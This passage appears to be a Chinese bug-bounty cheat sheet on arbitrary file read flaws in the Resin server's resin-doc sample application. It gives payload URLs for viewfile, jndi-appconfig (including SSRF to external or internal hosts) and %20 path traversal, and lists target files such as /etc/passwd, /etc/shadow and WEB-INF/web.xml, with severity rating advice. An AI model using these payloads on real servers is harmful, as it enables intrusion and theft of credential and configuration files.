一、resin
1 任意文件读取
默认下Resin的/webapps目录下/resin-doc中包含有一个扩展war文件,远程攻击者可能利用此漏洞读取Web主目录下的任意文件,包括JSP源码或类文件。
payload
# viewfile任意文件读取
http://localhost/resin-doc/viewfile/?file=index.jsp
# jndi-appconfig inputFile任意文件读取/SSRF
http://localhost/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=远端服务器(Ceye)/内网IP
# %20任意文件读取, 通过此漏洞可以读取到串口设备的信息以及网站任意目录的文件遍历。
http://www.example.com:8080/[path]/[device].[extension]
http://www.example.com:8080/%20../web-inf
http://www.example.com:8080/%20
http://www.example.com:8080/[path]/%20.xtp
file参数可读任意文件,index.jsp通常是扫描器扫出,无危害,要读到敏感文件,造成敏感文件泄露的危害,定级为中危。若只能读取无敏感信息的样例文件,定级低危或不收。
敏感文件(系统文件)
/etc/passwd
/etc/shadow
shadow和passwd都是存用户密码
WEB-INF/web.xml
Java servle